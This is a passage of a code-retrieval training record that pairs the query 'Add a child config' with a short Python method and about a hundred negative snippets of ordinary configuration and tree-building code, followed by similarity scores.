:\n\t\treturn self.manage_view_properties(expanded, unexpanded, \"/manage_propertiesForm\", perms = \"Manage properties\")", "def get_prop(self):\n\n if self.depth == 2:\n\n return \"\"\n\n return ri.RhinoInput(self.last).get_prop()", "def descendant_properties(self):\n response = check_defined(self, inspect.stack()[0][3])\n if not response:\n return response\n descendants = nx.descendants(self.se.property_only_graph,\n self.uri)\n result = restructure_output(self,\n descendants,\n inspect.stack()[0][3],\n self.output_type)\n return result" ]
[ "0.6558812", "0.62286186", "0.6222235", "0.6111081", "0.6004813", "0.5979281", "0.5608828", "0.5590664", "0.5550107", "0.5419193", "0.53930444", "0.5368933", "0.5345204", "0.53392524", "0.5152866", "0.5152002", "0.514644", "0.5144571", "0.51304764", "0.5085058", "0.50584644", "0.50355273", "0.5026561", "0.5001398", "0.49765545", "0.49714968", "0.4971482", "0.49477386", "0.49209678", "0.490763", "0.49023068", "0.48982802", "0.48976934", "0.48913345", "0.4885671", "0.48856318", "0.4885494", "0.48834714", "0.4882764", "0.4881576", "0.4874346", "0.48715752", "0.48701447", "0.48674327", "0.4861834", "0.48573688", "0.4844952", "0.4840363", "0.48317963", "0.48042354", "0.47923332", "0.47892702", "0.47866815", "0.478347", "0.477919", "0.47621185", "0.47593868", "0.47593868", "0.47593868", "0.47593868", "0.47593868", "0.47584453", "0.47549996", "0.4753754", "0.47429344", "0.47275168", "0.47251192", "0.4718781", "0.47182494", "0.47096625", "0.47081465", "0.4701575", "0.47010106", "0.47010106", "0.47010106", "0.47003993", "0.46998993", "0.46942866", "0.46929848", "0.46803796", "0.46797404", "0.46768996", "0.46720797", "0.46626878", "0.46619138", "0.46583843", "0.4655812", "0.4651831", "0.4647985", "0.46298546", "0.46284577", "0.46218485", "0.4619083", "0.46148524", "0.46133822", "0.4612502", "0.46103463", "0.4608182", "0.46080768", "0.4606708", "0.45809472" ]
0.0
-1
Add a child config
def add(self, key, child_config):
    self.__dict__[key] = child_config
    child_config.root = self
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_config(self, parent_node, child_value):\n edge_cost = self.cost(parent_node.value, child_value)\n child_node = Node(\n child_value,\n parent=parent_node,\n cost=parent_node.cost + edge_cost,\n depth=parent_node.depth + 1\n )\n parent_node.children.append(child_node)\n self.nodes.append(child_node)\n # self.tree = KDTree(np.vstack((self.tree.data, np.array([child_value[0], child_value[1]]))))\n coords = child_value[:2] # child_value only has 2 coords (x, y) right now, but it may have theta in the future.\n self.idx.insert(self.size, self.make_bounding_box(coords))\n self.size += 1\n \n return child_node", "def add_subconfig(self, name, arg_kws=None, func=None):\n if name in self.subconfig:\n raise ValueError(\"Subconfig '%s' is already defined.\" % name)\n if arg_kws is None:\n arg_kws = dict()\n argparser = self.subparsers.add_parser(name, **arg_kws)\n subconfig = SubConfig(argparser, self.config, name, func)\n self.subconfig[name] = subconfig\n return subconfig", "def inherit_config(child, parent, keys):\n for key in keys:\n if key not in child.keys():\n child[key] = parent[key]\n print(\n \"{} not found in io.yaml file, falling back to main config\".format(key)\n )\n\n return child", "def addChild(self, title, path, orig_cp):\n cp = L10nConfigParser(urljoin(self.baseurl, path), **self.defaults)\n cp.loadConfigs()\n self.children.append(cp)", "def new_child(self, prefix: str, root: Any = None, values: Dict[str, Any] = None) -> 'Config':\n config = Config(prefix, self)\n if root and prefix:\n config[prefix] = root\n if values:\n config.add_all(values)\n return config", "def add_child(self, node):\n\n\t\tif Defaults == node.__class__:\n\t\t\tself.__defaults = node\n\t\telif Variables == node.__class__:\n\t\t\tself.__variables = node\n\t\telif Servers == node.__class__:\n\t\t\tself.__servers = node\n\t\telif FileSets == node.__class__:\n\t\t\tself.__filesets = node\n\t\telif Targets == node.__class__:\n\t\t\tself.__targets = node\n\t\telse:\n\t\t\traise DepFileParsingError()\n\n\t\treturn True", "def add_child(self, child):\r\n self.children.append(child)", "def add_child(self, child):\r\n \r\n self._children.append(child)\r\n self.update_batch(self._batch, self._group)", "def add_child(self, child):\r\n self.children.append(child)", "def override(self, parent):\n return self.__class__(Cfg._mergedicts(self, parent, True))", "def add_child(self, child):\n self.children.append(child)", "def add_child(self, child):\n self.children.append(child)", "def add_child(self, child):\n self.childs.append(child)", "def add_child(self, text, alert_on_duplicate=False, idx=None, force_duplicate=False):\n\n if idx is None:\n idx = len(self.children)\n # if child does not exist\n if text not in self:\n new_item = HConfigChild(self, text)\n self.children.insert(idx, new_item)\n self.children_dict[text] = new_item\n return new_item\n # if child does exist and is allowed to be installed as a duplicate\n elif self._duplicate_child_allowed_check() or force_duplicate:\n new_item = HConfigChild(self, text)\n self.children.insert(idx, new_item)\n self.rebuild_children_dict()\n return new_item\n else:\n # If the child is already present and the parent does not allow\n # duplicate children, return the existing child\n # Ignore duplicate remarks in ACLs\n if alert_on_duplicate and not text.startswith('remark '):\n if self is self.root:\n path = [text]\n else:\n path = list(self.path()) + [text]\n self.logs.append(\"Found a duplicate section: {}\".format(path))\n return self.get_child('equals', text)", "def 
addChild( self, child ):\n\n self.childs.append( child )", "def appendChild(self, child):\n self.__initChild()\n self.__child.append(child)", "def add_child(self, child: UIComponent):\n child.parent = self\n child.set_chronometer(self._chronometer)\n self.children.append(child)\n if self.props.resize_mode == ResizeMode.AUTO:\n self._reset('add_child')", "def _newChild(self, child):\n self._testKeySubNsAdd()\n self._getSubNsList().append(child)", "def addChild(self, child):\n #assert child not in self.children\n #if child not in self.children:\n child.parents.append(self)\n self.children.append(child)", "def _init_child(self,child,path):\n pass", "def add_child(self, child, label):\n self.children[label] = child\n child.parents.append(self)", "def init_config(self):\n super().init_config()\n for param in self.parameters():\n if param.name == 'source':\n continue\n self.add_config_item(param.name,\n saver=lambda p=param: getattr(p, \"value\"),\n loader=lambda x, p=param: setattr(p, \"value\", x),\n default=param.default)", "def add_config_field(self, content_type, name, *args, **kwargs):\n if name == 'representation_args':\n raise ValueError('{} is a reserved Config field name'.format(name))\n self._add_config_arg(ConfigField, content_type, name, *args, **kwargs)", "def append_child(self, child):\n\t\tself._children.append(child)", "def add_child(self, child):\n name = child.name\n self._children[name] = child\n self._name_dict[name.split('-')[0]] += 1", "def create_subparser(self, parent, storage):\n p = parent.add_parser(\n 'inject-config',\n help=\"Inject a configuration file into an OVF package\",\n usage=self.UI.fill_usage(\"inject-config\", [\n \"PACKAGE -c CONFIG_FILE [-o OUTPUT]\",\n \"PACKAGE -s SECONDARY_CONFIG_FILE [-o OUTPUT]\",\n \"PACKAGE -c CONFIG_FILE -s SECONDARY_CONFIG_FILE [-o OUTPUT]\",\n ]),\n description=\"\"\"Add one or more \"bootstrap\" configuration \"\"\"\n \"\"\"file(s) to the given OVF or OVA.\"\"\")\n\n p.add_argument('-o', '--output',\n help=\"\"\"Name/path of new VM package to create \"\"\"\n \"\"\"instead of updating the existing package\"\"\")\n\n p.add_argument('-c', '--config-file',\n help=\"\"\"Primary configuration text file to embed\"\"\")\n p.add_argument('-s', '--secondary-config-file',\n help=\"\"\"Secondary configuration text file to embed \"\"\"\n \"\"\"(currently only supported in IOS XRv for \"\"\"\n \"\"\"admin config)\"\"\")\n p.add_argument('PACKAGE',\n help=\"\"\"Package, OVF descriptor or OVA file to edit\"\"\")\n p.set_defaults(instance=self)\n\n storage['inject-config'] = p", "def spawnWithConfig(self, config, here, there):\n raise NotImplementedError(\"subclasses must implement the specifics\")", "def add(ctx, option, value):\n properties = option.split(\".\")\n section = properties[0]\n option = properties[1]\n cfg = ctx.obj['cfg']\n if not cfg.has_section(section):\n cfg.add_section(section)\n cfg.set(section, option, value)\n with open(config_path(), 'w') as fp:\n cfg.write(fp)", "def add_child(self, child, probe_id=None):\n node = None\n matching_nodes = [x for x in self.children if x.name == child.name] # see if the added node has already in its children list\n # print(\"[*] add children with the name {}.. 
matching_nodes: {}\".format(child.name, matching_nodes))\n if len(matching_nodes) > 0:\n node = matching_nodes[0]\n if probe_id is not None:\n node.probes = probe_id\n # print(\"\\t[*] current node: {}\".format(node.name))\n if node is None:\n if probe_id is not None:\n child.probes = probe_id\n self.children.append(child)\n node = child\n # print(\"\\t[*] node {} is appended to {} child list\".format(node.name, self.name))\n return node", "def addConfiguration(self, d):\n self.__populateDict(self._configuration, d)", "def _configure_addon(self):\n cfg = None\n try:\n data_dir = os.path.split(self.props.data_dir)\n\n cfg = Configuration(jobtype='Blender', \n data_path=data_dir[0],\n log_level=int(self.props.log_level),\n name=self.props.ini_file,\n datadir=data_dir[1])\n \n except (InvalidConfigException, IndexError) as exp:\n self.log.warning(\"Warning failed to load config file, \"\n \"creating new default config.\")\n self.log.warning(str(exp))\n \n finally:\n\n if not os.path.isdir(self.props.data_dir):\n raise EnvironmentError(\"Data directory not created - \"\n \"please ensure you have adequate permissions.\")\n\n if not cfg:\n cfg = Configuration(jobtype='Blender', log_level='warning')\n\n if self.props.endpoint:\n cfg = override_config(cfg, endpoint=self.props.endpoint)\n if self.props.account:\n cfg = override_config(cfg, account=self.props.account)\n if self.props.key:\n cfg = override_config(cfg, key=self.props.key)\n if self.props.client_id:\n cfg = override_config(cfg, client_id=self.props.client_id)\n if self.props.tenant:\n cfg = override_config(cfg, tenant=self.props.tenant)\n if self.props.redirect:\n cfg = override_config(cfg, redirect=self.props.redirect)\n\n cfg.save_config()\n return cfg", "def add_config(self, conf_map):\n if self.active.isChecked():\n self.add_feat_conf(conf_map)", "def AddConfigVar(name, doc, configparam, root=config, in_c_key=True):\r\n\r\n # This method also performs some of the work of initializing ConfigParam\r\n # instances\r\n\r\n if root is config:\r\n #only set the name in the first call, not the recursive ones\r\n configparam.fullname = name\r\n sections = name.split('.')\r\n if len(sections) > 1:\r\n # set up a subobject\r\n if not hasattr(root, sections[0]):\r\n # every internal node in the config tree is an instance of its own\r\n # unique class\r\n class SubObj(object):\r\n _i_am_a_config_class = True\r\n setattr(root.__class__, sections[0], SubObj())\r\n newroot = getattr(root, sections[0])\r\n if (not getattr(newroot, '_i_am_a_config_class', False)\r\n or isinstance(newroot, type)):\r\n raise TypeError(\r\n 'Internal config nodes must be config class instances',\r\n newroot)\r\n return AddConfigVar('.'.join(sections[1:]), doc, configparam,\r\n root=newroot, in_c_key=in_c_key)\r\n else:\r\n if hasattr(root, name):\r\n raise AttributeError('This name is already taken',\r\n configparam.fullname)\r\n configparam.doc = doc\r\n configparam.in_c_key = in_c_key\r\n # Trigger a read of the value from config files and env vars\r\n # This allow to filter wrong value from the user.\r\n if not callable(configparam.default):\r\n configparam.__get__()\r\n else:\r\n # We do not want to evaluate now the default value when it is a callable.\r\n try:\r\n fetch_val_for_key(configparam.fullname)\r\n # The user provided a value, filter it now.\r\n configparam.__get__()\r\n except KeyError:\r\n pass\r\n setattr(root.__class__, sections[0], configparam)\r\n _config_var_list.append(configparam)", "def fm_append_member(cls, parent, child):\n 
parent.fm_append(child, cls.CHILD)\n child.fm_append(parent, cls.PARENT)", "def add_child(self, child):\n name = name_displayer.display(child)\n birth = get_birth_or_fallback(self.dbstate.db, child)\n birth_date, birth_sort, birth_place = self.get_date_place(birth)\n death = get_death_or_fallback(self.dbstate.db, child)\n death_date, death_sort, death_place = self.get_date_place(death)\n self.model.add((child.get_handle(),\n name,\n birth_date,\n birth_sort,\n death_date,\n death_sort))", "def inherit(self, parent):\n return self.__class__(Cfg._mergedicts(self, parent, False))", "def add_config_item(self, config, value, path):\n if len(path) == 1:\n config[path[0]] = value\n return\n if path[0] not in config:\n config[path[0]] = dict()\n elif isinstance(config[path[0]], str):\n config[path[0]] = dict() if config[path[0]] == u\"\" \\\n else {config[path[0]]: u\"\"}\n self.add_config_item(config[path[0]], value, path[1:])", "def add_child(self, child_account):\r\n self._children.append(child_account)", "def append_child(self, child):\n \n # Check a type of 'child' parametr\n if not isinstance(self, SitemapTreeElement):\n raise TypeError('SiteMapTreeElement type expected')\n self._children.append(child)", "def add_subcommands(self, name='subcmd', arg_kws=None, optional=False):\n if self._subcmds is not None:\n raise RuntimeError(\"This config already has subcommands.\")\n if name in self.ReservedVariables or name[0] == '_':\n raise ValueError(\"Config variable name '%s' is reserved.\" % name)\n if name in self.confvariable:\n raise ValueError(\"Config variable '%s' is already defined.\" % name)\n if arg_kws is None:\n arg_kws = dict(title=\"subcommands\")\n else:\n arg_kws = dict(arg_kws)\n arg_kws['dest'] = name\n subparsers = self.argparser.add_subparsers(**arg_kws)\n var = ConfigSubCmds(name, optional, self, subparsers)\n self.confvariable[name] = var\n self.confvariables.append(var)\n self._subcmds = var\n return var", "def add_config(self, config):\n\n if config.identifier in self.configs:\n raise DuplicateConfigException(\n \"Builder already has config with identifier : {}\".format(\n config.identifier\n )\n )\n\n self.configs[config.identifier] = config", "def append_conf(self, chart_id, producer, renderer):\n self.confs[chart_id] = {\"producer\": producer, \"renderer\": renderer}", "def add_easyconfig(self, cfg, name, version, stats, append):\n dest = FileRepository.add_easyconfig(self, cfg, name, version, stats, append)\n # add it to version control\n if dest:\n try:\n self.client.add(dest)\n except GitCommandError, err:\n self.log.warning(\"adding %s to git failed: %s\" % (dest, err))", "def add_child(self, cd, wt: float):\n self.child.append([cd, wt])", "def config(*subconfig):\n\n with open('configure.yaml', 'r') as stream:\n args = yaml.load(stream)\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(description='')\n parser.add_argument(\n '--node',\n '-n',\n help='The node ID.'\n )\n parser.add_argument(\n '--processes',\n '-p',\n help='The total number of processes.'\n )\n # Store command line arguments in a dict\n cl_args = parser.parse_args()\n cl_args_dict = vars(cl_args)\n # Combine\n args.update(cl_args_dict)\n # Find subconfig if argument is passed\n for s in subconfig:\n try:\n args = args[s]\n except:\n pass\n # Return\n return args", "def __init__(self, configpath):\n super().__init__('master process')\n self._configpath = configpath\n self._children = []", "def set_child(self, child):\n if child.tags is None:\n raise Exception(\"Missing tags when: 
Component {0} tried ta add_child \"\n \"component: {1} to its children. \".format(str(self), str(child)))\n if child.component_type is None:\n raise Exception(\"Missing component_type when: Component {0} tried ta add_child \"\n \"component: {1} to its children. \".format(str(self), str(child)))\n if not child._parent is None:\n raise Exception(\"Component {0} tried ta add_child \"\n \"component: {1} to its children. \"\n \"But it already \"\n \"had parent: {2}.\".format(str(self), str(child), str(child.parent)))\n if self.has(child.component_type):\n self.remove_component_of_type(child.component_type)\n self._children[child.component_type] = child\n self._add_child_to_tag_table(child)\n child.parent = self", "def add(ctx, project_root, name, level, formatter, log_path):\n with ensure_conf_exist(project_root) as logme_conf:\n\n validate_conf(name, logme_conf)\n\n conf_content = get_tpl(name, level=level, formatter=formatter, filename=log_path)\n config = get_config(conf_content)\n\n # check if section already exist\n with logme_conf.open('a') as conf:\n config.write(conf)", "def set_config(self, cfg):\n\n cfg.add_section(self.name)\n for attr, value in self.__dict__.items():\n if value not in [\"false\", \"none\"] and attr != \"name\":\n #Before creating config file _id must be id, and _type must be type\n if attr == \"_id\" or attr == \"_type\" : attr = attr.split(\"_\")[-1]\n #There isnt any underscore in config options, replace them with dashes if found any\n attr = attr.replace(\"_\", \"-\")\n cfg.set(self.name, attr, value)", "def AddConfigVar(name, doc, configparam, root=config):\n\n # This method also performs some of the work of initializing ConfigParam\n # instances\n\n if root is config:\n # only set the name in the first call, not the recursive ones\n configparam.fullname = name\n sections = name.split('.')\n if len(sections) > 1:\n # set up a subobject\n if not hasattr(root, sections[0]):\n # every internal node in the config tree is an instance of its own\n # unique class\n class SubObj(object):\n _i_am_a_config_class = True\n setattr(root.__class__, sections[0], SubObj())\n newroot = getattr(root, sections[0])\n if (not getattr(newroot, '_i_am_a_config_class', False) or\n isinstance(newroot, type)):\n raise TypeError(\n 'Internal config nodes must be config class instances',\n newroot)\n return AddConfigVar('.'.join(sections[1:]), doc, configparam,\n root=newroot)\n else:\n if hasattr(root, name):\n raise AttributeError('This name is already taken',\n configparam.fullname)\n configparam.doc = doc\n # Trigger a read of the value from config files and env vars\n # This allow to filter wrong value from the user.\n if not callable(configparam.default):\n configparam.__get__(root, type(root), delete_key=True)\n else:\n # We do not want to evaluate now the default value\n # when it is a callable.\n try:\n fetch_val_for_key(configparam.fullname)\n # The user provided a value, filter it now.\n configparam.__get__(root, type(root), delete_key=True)\n except KeyError:\n pass\n setattr(root.__class__, sections[0], configparam)\n _config_var_list.append(configparam)", "def set_config(self, cfg):\n\n cfg.add_section(self.name)\n for attr, value in self.__dict__.items():\n if value not in [\"false\", \"none\"] and attr != \"name\":\n attr = attr.replace(\"_\", \"-\")\n cfg.set(self.name, attr, value)", "def set_config(self, cfg):\n\n cfg.add_section(self.name)\n for attr, value in self.__dict__.items():\n if value not in [\"false\", \"none\"] and attr != \"name\":\n attr = 
attr.replace(\"_\", \"-\")\n cfg.set(self.name, attr, value)", "def set_config(self, cfg):\n\n cfg.add_section(self.name)\n for attr, value in self.__dict__.items():\n if value not in [\"false\", \"none\"] and attr != \"name\":\n attr = attr.replace(\"_\", \"-\")\n cfg.set(self.name, attr, value)", "def _add_child(self, node):\n self.children.update({\n node.name: node\n })\n node.path = self._sep.join([self.path, node.name])\n node.parent = self", "def config(self, **kwargs):\n\n # our options that we deal with\n entry = options[\"entry\"]\n\n # cannot modify kwargs while iterating over it...\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v = kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n\n # having removed our options, pass rest to parent\n super().config(**kwargs)", "def add_spoof_child(self, child):\n if child.tags is None:\n raise Exception(\"Component {0} tried to add_child \"\n \"component: {1} to its children. \"\n \"But tags \"\n \"was not set.\".format(str(self), str(child)))\n if child.component_type is None:\n raise Exception(\"Component {0} tried to add_child \"\n \"component: {1} to its children. \"\n \"But component_type \"\n \"was not set.\".format(str(self), str(child)))\n if not child._parent is None and child.parent != self:\n raise Exception(\"Component {0} tried to add_child \"\n \"component: {1} to its children. \"\n \"But it already \"\n \"had parent: {2}.\".format(str(self), str(child), str(child.parent)))\n if not child.component_type in self._spoofed_children:\n self._spoofed_children[child.component_type] = []\n self._spoofed_children[child.component_type].append(child)\n self._add_child_to_tag_table(child)\n child.parent = self", "def add_child(self, child):\n\n self._children.add(child)", "def add_configuration(self, params):\n config_index = len(self.configurations)+1\n # '-g' is a mandatory argument of CaVEMan (Location of tsv ignore regions file)\n # Other programs do not require (or even support) this type of file\n # Therefore, this benchmark framework makes this file an optional input\n # (an empty file is given if not specified)\n if 'setup:-g' not in params.keys():\n logging.info(\"CaVEMan: config_{0} adding setup:-g=/dev/null in params\".format(config_index))\n params['setup:-g'] = '/dev/null'\n self.configurations.append(SinglePairedConfiguration(params, config_index))", "def add(self, child):\r\n# child = Node()\r\n# child._id = Kinetic.Global.id_counter\r\n# Kinetic.Global.id_counter += 1\r\n child.index = len(self.children)\r\n child.parent = self\r\n self.children.append(child)\r\n stage = child.get_stage()\r\n\r\n if not stage:\r\n Kinetic.Global._add_temp_node(child)\r\n else:\r\n stage._add_id(child)\r\n stage._add_name(child)\r\n\r\n go = Kinetic.Global\r\n go._pull_nodes(stage)\r\n\r\n if hasattr(self, '_add'):\r\n self._add(child)\r\n\r\n return '%s.add(%s);' %(self.name, child.name)", "def add_config(self, config):\n clean=lambda n: n.strip().strip('\"').lower()\n for line in config.split('\\n'):\n items=line.strip().split()\n if items and len(items) >= 3:\n cmd, evt, hnd=items[:3]\n \"\"\" NOTE\n - just 'bind' command expected right now\n - '+' prepended ti the handler means REPEAT (make sense just for keyboard keys actually)\n \"\"\"\n cmd=clean(cmd)\n if cmd in ['bind']:\n evt,hnd=(clean(evt), clean(hnd))\n if not cmd in self.config: self.config[cmd]={}\n repeat=hnd.startswith('+')\n if repeat: hnd=hnd[1:]\n self.config[cmd].update([[evt, [hnd, repeat]]])", "def set_config(self, cfg):\n\n cfg.add_section(self.name)\n 
for attr, value in self.__dict__.items():\n if value not in [\"false\", \"none\", \"0\"] and attr != \"name\":\n attr = attr.replace(\"_\", \"-\")\n cfg.set(self.name, attr, value)", "def add_child(self, child):\n\t\t\n\t\tif child.__class__ != FileObject:\n\t\t\traise InvalidParameterError('child', 'should be an instance of FileObject')\n\t\t\n\t\tself.__childs.append(child)\n\t\treturn True", "def add_child(self, child):\n \n if not (isinstance(child, CompoundCamera) or \\\n isinstance(child, sensors.SensorElement)):\n raise TypeError('`child` must be type: SensorElement or '\n 'CompoundCamera')\n \n for c in self.children:\n if c.name == child.name:\n if c is child:\n raise NameError('Child object already registered with parent!')\n else:\n raise NameError('Child with name %s already registered with'\n ' this parent (%s) -- please change the ID'\n ' number to give this object a unique name '\n 'and re-register it as a child object' % \\\n (child.name, self.name))\n \n self.children.append(child)\n child._parent = self\n \n return", "def add_child(self, parent, child):\n wanted_parent = self.__find(parent, self.root)\n\n # check if there isn't a child with that value already\n child_exists = self.__find(child, self.root)\n if child_exists:\n raise Exception('A child with value {} already exists!'.format(child))\n\n wanted_parent.add_child(Node(child, parent=wanted_parent))\n self.nodes += 1", "def configfile(self, fp):\n if not self.modifier.skip_configfile:\n if os.path.exists(fp):\n self.configfiles.append(fp)\n c = snakemake.io.load_configfile(fp)\n update_config(self.config, c)\n if self.overwrite_config:\n logger.info(\n \"Config file {} is extended by additional config specified via the command line.\".format(\n fp\n )\n )\n update_config(self.config, self.overwrite_config)\n elif not self.overwrite_configfiles:\n fp_full = os.path.abspath(fp)\n raise WorkflowError(\n f\"Workflow defines configfile {fp} but it is not present or accessible (full checked path: {fp_full}).\"\n )\n else:\n # CLI configfiles have been specified, do not throw an error but update with their values\n update_config(self.config, self.overwrite_config)", "def post_config_root_create(self, resource_dict):\n pass", "def configure(self, conf):\n\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))", "def add_config(self, key, type_, default=NOT_SET, env_var=None):\n self.config[key] = {'type': type_}\n if env_var is not None:\n self.config[key]['env_var'] = env_var\n if default is not NOT_SET:\n self.config[key]['default'] = default", "def add_config(self):\n\n config = {\n 'count_up': CountUp,\n 'count_down': CountDown,\n 'count_up_or_down': CountUpOrDown,\n 'high_speed_counter_definition': HighSpeedCounterDefinition,\n 'high_speed_counter': HighSpeedCounter,\n 'pulse_output': PulseOutput\n }\n\n return config", "def add_config(self):\n\n config = {\n 'byte_to_integer': ByteToInteger,\n 'integer_to_byte': IntegerToByte,\n 'integer_to_double_integer': IntegerToDoubleInteger,\n 'integer_to_string': IntegerToString,\n 'double_integer_to_integer': DoubleIntegerToInteger,\n 'double_integer_to_real': DoubleIntegerToReal,\n 'double_integer_to_string': DoubleIntegerToString,\n 
'binary_coded_decimal_to_integer': BinaryCodedDecimalToInteger,\n 'integer_to_binary_coded_decimal': IntegerToBinaryCodedDecimal,\n 'round': Round,\n 'truncate': Truncate,\n 'real_to_string': RealToString,\n 'integer_to_ascii': IntegerToASCII,\n 'double_integer_to_ascii': DoubleIntegerToASCII,\n 'real_to_ascii': RealToASCII,\n 'ascii_to_hexadecimal': ASCIIToHexadecimal,\n 'hexadecimal_to_ascii': HexadecimalToASCII,\n 'string_to_integer': StringToInteger,\n 'string_to_double_integer': StringToDoubleInteger,\n 'string_to_real': StringToReal,\n 'decode': Decode,\n 'encode': Encode,\n 'segment': Segment\n }\n\n return config", "def add_child(self, child_node):\n # Assignment group doesn't have short_name\n if not hasattr(child_node.node, 'short_name'):\n # Makes sure the candidates are shown if a student \n # is part of more than one AssignmentGroup\n if len(self.children) != 0:\n child_node.display_group = True\n # Contains only one, set display_group to True for that element as well.\n if len(self.children) == 1:\n list(self.children.values())[0].display_group = True\n self.children[child_node] = child_node\n else:\n if child_node.get_name() not in self.children:\n self.children[child_node.get_name()] = child_node\n else:\n self.children[child_node.get_name()].merge(child_node)", "def __init__(self, key, parent=None):\n if parent:\n msg = f\"Missing config while rendering {parent}: {key}\"\n else:\n msg = f\"Missing config: {key}\"\n super(MissingConfiguration, self).__init__(msg)", "def config(self):\n raise NotImplementedError", "def setProperty(self, child, key, value):\n\n # First get the child's dictionary\n childDict = self.getInfoDict(child)\n if childDict:\n childDict[key] = value", "def extend(clself, other):\n clself._cfg_def.extend(other._cfg_def)\n for key, optdef in clself._cfg_def.options.iteritems():\n setattr(clself, key, optdef)", "def addChildObject(self, child):\n \n currChild = self.getChild(child.getName())\n if currChild:\n index = self.getIndex(currChild)\n if index != -1:\n self._children[index] = child\n child.setParent(self)\n # Unset the existing child's parent\n currChild.setParent(None)\n del currChild\n \n self.__setChildDict(child)\n else:\n child.setParent(self) \n self._children.append(child)\n self.__setChildDict(child)", "def _setup_parents(self, parents=None):\n from trac import config\n self.parents = (parents or [])\n for filename in self.get('inherit', 'file').split(','):\n filename = Section._normalize_path(filename.strip(), self.env)\n self.parents.append(config.Configuration(filename))", "def __setChildDict(self, child):\n \n d = self[self._name]\n d[child.getName()] = child.getDict()", "def appendChild(self, child):\n self.points += child.points.copy()\n self.children.append(child)", "def add_child(self, child):\n assert isinstance(child, (Node, str))\n self.children.append(child)\n return child", "def update_config(self, update_dict):\n self.config = recursive_merge_dicts(self.config, update_dict)", "def add_child(self, child: object, add_parent=True) -> bool:\n if child not in self._children:\n self._children.append(child)\n\n if add_parent:\n child.add_parent(self, add_child=False)\n\n return True\n\n return False", "def create_config(self) -> None:\n pass", "def create_config(self) -> None:\n pass", "def add_extra(self, entry, value):\n\n config_spec = vim.vm.ConfigSpec()\n self.logger.info(\"Adding/Updating extra config: {0} = {1}\".format(entry, value))\n opt = vim.option.OptionValue()\n opt.key = entry\n opt.value = value\n 
config_spec.extraConfig = [opt]\n return self.vm_obj.ReconfigVM_Task(spec=config_spec)", "def configure(self, section):", "def add_parent_attributes(self):\n if len(self.parent_attributes) == 0:\n return\n dest = self.parent.attributes\n source = self.parent_attributes\n changes = {}\n self.merge_attribute_defs(dest, source, changes)\n for aid, value in changes.iteritems():\n# self.parent.h5node.attrs[aid] = value\n # may need modifying for MATLAB\n #- if self.path not in self.file.file_pointer:\n if self.file.get_node(self.path, abort=False) is None:\n # create parent node since it does not exist\n print \"trying to set parent attributes on non-registered parent node:\"\n print \"Non-registered parent node is: '%s'\", self.path\n traceback.print_stack()\n sys.exit(1)\n #- self.file.file_pointer[self.path].attrs[aid] = value\n self.file.set_attribute(self.path, aid, value)", "def merge(self, newer_config, **kwargs):\n kwargs['merge'] = True\n logger.debug('from parent merge: %s', kwargs)\n return self.update(newer_config, **kwargs)", "def add_child(self, child, **kwargs):\n if child.is_root:\n return\n if 'after' in kwargs:\n if kwargs['after'] is not None:\n try:\n self.children.insert(\n self.children.index(kwargs['after']), child)\n return\n except ValueError:\n self.children.append(child)\n else:\n self.children.insert(0, child)\n self.children.append(child)\n if child.parent is not self and child.parent is not None:\n child.parent.remove_child(child)\n # pylint: disable=protected-access\n child.__parent = self", "def configure(new_config: Mapping):\n config.update(new_config)", "def add_child(self, child):\n super(ImageInput, self).add_child(child)\n\n # If this is a relative URL, it's relative to the statics directory\n # of the application\n src = self.get('src')\n if src is not None:\n self.set('src', absolute_url(src, self.renderer.head.static_url))", "def add_child(self, child):\n\n child_parent_scope = child.parent_scope\n child_parent_value = child.parent_value\n\n if all([\n child_parent_scope == self.scope,\n child_parent_value == self.value,\n self.user in (child.user, ANY),\n ]):\n self.children.append(child)\n child.parent = self\n return True\n\n else:\n return any([node.add_child(child) for node in self.children])", "def config_changed(self, update_parent=True):\n super(Assembly, self).config_changed(update_parent)\n # driver must tell workflow that config has changed because\n # dependencies may have changed\n if self.driver is not None:\n self.driver.config_changed(update_parent=False)\n \n # Detect and save any loops in the graph.\n if hasattr(self, '_depgraph'):\n graph = self._depgraph._graph\n self._graph_loops = nx.strongly_connected_components(graph)", "def patch_config(self_config, indict):\n for key in self_config:\n if isinstance(self_config[key], Section) \\\n and key in indict and isinstance(indict[key], Section):\n self_config[key].parent = self_config\n self_config[key].main = self_config.main\n self_config.comments[key] = indict.comments[key]\n self_config.inline_comments[key] = indict.inline_comments[key]\n patch_config(self_config[key], indict[key])", "def add_parent(self, child, parent):\r\n setp = self._parents.setdefault(child, set())\r\n setp.add(parent)", "def _add_child_addresses(children_dicts):\n child_addresses = list(children_dicts.keys())\n cambrionix_address = [\n key for key, value in children_dicts.items()\n if value.product_name in usb_config.CAMBRIONIX_NAMES\n ][0]\n children_dicts[cambrionix_address].child_addresses = child_addresses\n 
for address in child_addresses:\n if address != cambrionix_address:\n children_dicts[address].usb_hub_address = cambrionix_address", "def update_config(self, config):\n # add follower public folder to the CKAN's list of public folders\n here = os.path.dirname(__file__)\n public_dir = os.path.join(here, 'public')\n if config.get('extra_public_paths'):\n config['extra_public_paths'] += ',' + public_dir\n else:\n config['extra_public_paths'] = public_dir\n # add follower template folder to the CKAN's list of template folders\n template_dir = os.path.join(here, 'templates')\n if config.get('extra_template_paths'):\n config['extra_template_paths'] += ',' + template_dir\n else:\n config['extra_template_paths'] = template_dir", "def _add_input(config, input_file, folder, scale_factor, weight, nick, nick_suffix=\"\", proxy_prefix=\"\"):\n\t\tconfig.setdefault(\"files\", []).append(input_file)\n\t\tconfig.setdefault(\"folders\", []).append(folder)\n\t\tconfig.setdefault(\"scale_factors\", []).append(scale_factor)\n\t\tconfig.setdefault(\"weights\", []).append(weight)\n\t\tconfig.setdefault(\"nicks\", []).append(nick+nick_suffix)\n\t\tconfig.setdefault(\"tree_draw_options\", []).append(\"proxy\" if len(proxy_prefix)>0 else \"\")\n\t\tconfig.setdefault(\"proxy_prefixes\", []).append(proxy_prefix)\n\t\t\n\t\treturn config", "def add_edge(self, parent, child):\r\n log.debug('add_edge({}, {})'.format(parent, child))\r\n if parent is not None:\r\n 